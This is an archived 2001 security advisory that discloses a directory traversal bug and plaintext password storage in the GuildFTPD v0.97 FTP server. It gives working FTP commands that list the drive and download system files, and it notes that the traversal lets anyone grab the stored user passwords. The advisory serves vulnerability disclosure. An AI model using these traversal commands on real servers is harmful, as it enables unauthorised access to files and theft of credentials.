GuildFTPD v0.97 Directory Traversal / Weak password encryption AFFECTED SYSTEMS GuildFTPD v0.97 tested on Windows 9x, probably works on NT / 2k as well DESCRIPTION 1) Directory Traversal Consider the following FTP session (I'm using windows' FTP.EXE proggie, and its associated commands) : The following commands : CD ../ CD .../ CD /.../ CD c:\ etc... all give "550 Access denied." errors, so the frontdoor seems to be closed... The following stuff *does* work however : LS /../* This way, we can map out the whole harddrive... other example : LS /../../windows/* Now, to retrieve a file, do something like : GET /../windows/system.ini c:\received-file.txt 2) And another thing... I don't want to whine to the guys who wrote this program, but storing the user:password pairs in plaintext in the program directory (the default.usr & default?.usr files) is asking for trouble : most ftp servers at least provide some way of encryption / hashing... when you combine this with the traversal bug, anyone can get the passwords of all the users by grabbing the default.usr file. VENDOR STATUS I have sent this advisory to both DrPhibez <guildftpdat_private> and Nitro187 (Matthew Flewelling) <nitroat_private>, the programmers of GuildFTPD ======================================================= [ByteRage] <byterageat_private> [www.byterage.cjb.net] ======================================================= __________________________________________________ Do You Yahoo!? Yahoo! Auctions - buy the things you want at great prices http://auctions.yahoo.com/
This archive was generated by hypermail 2b30 : Sat May 26 2001 - 11:03:06 PDT